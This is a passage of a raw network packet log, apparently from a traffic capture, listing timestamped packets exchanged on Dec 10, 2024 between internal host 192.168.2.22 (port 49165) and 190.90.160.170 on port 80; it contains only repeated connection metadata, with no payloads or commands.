                          Dec 10, 2024 14:20:54.559827089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.559911013 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.560704947 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.560718060 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.560758114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.560758114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.561376095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.561388016 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.561436892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.562185049 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.562196016 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.562242985 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.562242985 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.562935114 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.562948942 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.562978983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.563263893 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.563822985 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.563834906 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.563929081 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.564393044 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.564539909 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.564563990 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.564657927 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.565161943 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.565268040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.565429926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.565505028 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.566073895 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.566098928 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.566137075 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.566147089 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.571355104 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.571434021 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.571652889 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.571697950 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.571851015 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.571865082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.571896076 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.572602034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.572614908 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.572653055 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.573282957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.573414087 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.720310926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.720408916 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.720434904 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.720490932 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.720608950 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.720622063 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.720680952 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.721198082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.721349955 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.721390009 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.721465111 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.721970081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.721992016 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.722035885 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.722035885 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.722497940 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.722579956 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.722589016 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.722667933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.723272085 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.723284006 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.723323107 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.724175930 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.724189997 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.724286079 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.724991083 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.725055933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.725120068 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.725163937 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.725723982 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.725775957 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.725820065 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.725883961 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.726330042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.726397991 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.726398945 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.726449966 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.727282047 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.727319002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.727330923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.727406025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.728301048 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.728312969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.728368044 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.729022026 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.729096889 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.729496002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.729552031 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.730020046 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.730101109 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.730106115 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.730144978 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.730820894 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.730889082 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.731285095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.731333017 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.731703997 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.731756926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.732028008 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.732084990 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.732670069 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.732681990 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.732731104 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.733294964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.733309984 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.733351946 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.733351946 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.733884096 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.733896971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.733930111 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.733958006 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.734428883 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.734441042 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.734484911 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.734484911 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.734997034 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.735050917 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.735560894 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.735618114 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.735816002 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.735865116 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.735881090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.735924959 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.736633062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.736645937 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.736684084 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.736684084 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.737309933 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.737322092 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.737377882 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.738006115 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.738049030 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.738065004 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.738095045 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.738754988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.738818884 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.738864899 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.738913059 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.739712000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.739758015 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.739763021 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.739824057 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.740338087 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.740396976 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.740462065 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.740508080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.741190910 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.741203070 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.741240978 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.741267920 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.742077112 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.742089033 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.742121935 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.742144108 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.742799997 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.742811918 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.742878914 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.743551970 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.743567944 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.743613958 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.743613958 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.744214058 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.744282007 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.744319916 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.744363070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.745038986 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.745050907 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.745100021 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.745100021 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.745788097 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.745801926 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.745852947 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.745852947 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.746697903 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.746711969 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.746751070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.746751070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.747339964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.747353077 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.747390985 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.748229980 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.748243093 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.748274088 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.748296022 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.748847961 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.748899937 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.749011993 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.749077082 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.749756098 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.749768972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.749813080 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.750433922 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.750448942 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.750483990 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.750514984 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.751482964 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.751496077 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.751543999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.751543999 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.752295971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.752309084 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.752356052 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.752799988 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.752844095 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.752846003 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.752887964 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.753514051 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.753557920 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.753566027 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.753601074 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.754323959 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.754338026 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.754379988 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.754400015 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.755052090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.755130053 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.755531073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.755582094 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.755994081 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.756006956 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.756048918 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.756048918 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.756762028 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.756773949 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.756805897 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.756822109 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.757493973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.757514000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.757545948 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.757545948 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.758230925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.758342981 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.763676882 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.763688087 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.763860941 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.764046907 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.764060974 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.764106989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.764106989 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.764748096 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.764822960 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.764990091 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.765038967 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.765607119 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.765650988 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.912605047 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.912681103 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.912846088 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.912846088 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.913007021 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.913052082 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.913086891 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.913086891 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.913710117 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.913772106 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.913882971 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.913919926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.914319992 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.914340973 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.914366007 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.914398909 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.915077925 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.915117979 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.915136099 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.915165901 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.915887117 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.915962934 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.915966034 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.916016102 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.916639090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.916706085 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.916743994 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.916835070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.917409897 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.917433023 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.917469025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.917469025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.918148041 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.918195963 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.918210983 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.918278933 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.918943882 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.919023991 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.919101954 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.919152975 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.919822931 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.919899940 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.920295954 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.920341969 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.920607090 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.920661926 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.920691013 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.920734882 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.921264887 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.921304941 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.921335936 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.921380043 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.922029972 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.922080040 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.922194958 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.922257900 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.922863960 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.922913074 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.922938108 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.922980070 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.923588037 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.923645973 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.923660040 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.923713923 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.924438000 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.924457073 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.924489021 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.924503088 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.925143957 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.925194025 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.925209999 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.925246954 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.926007032 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.926064014 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.926153898 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.926193953 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.926696062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.926745892 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.926760912 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.926810026 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.927479029 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.927529097 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.927583933 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.927629948 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.928450108 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.928462982 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.928560972 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.930200100 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930217981 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930229902 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930242062 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930254936 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.930278063 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.930298090 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.930741072 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930789948 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.930809975 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.930840015 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.931536913 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.931550026 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.931598902 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.932193995 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.932207108 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.932235956 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.932235956 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.932907104 CET8049165190.90.160.170192.168.2.22
                          Dec 10, 2024 14:20:54.932990074 CET4916580192.168.2.22190.90.160.170
                          Dec 10, 2024 14:20:54.933546066 CET8049165190.90.160.170192.168.2.22
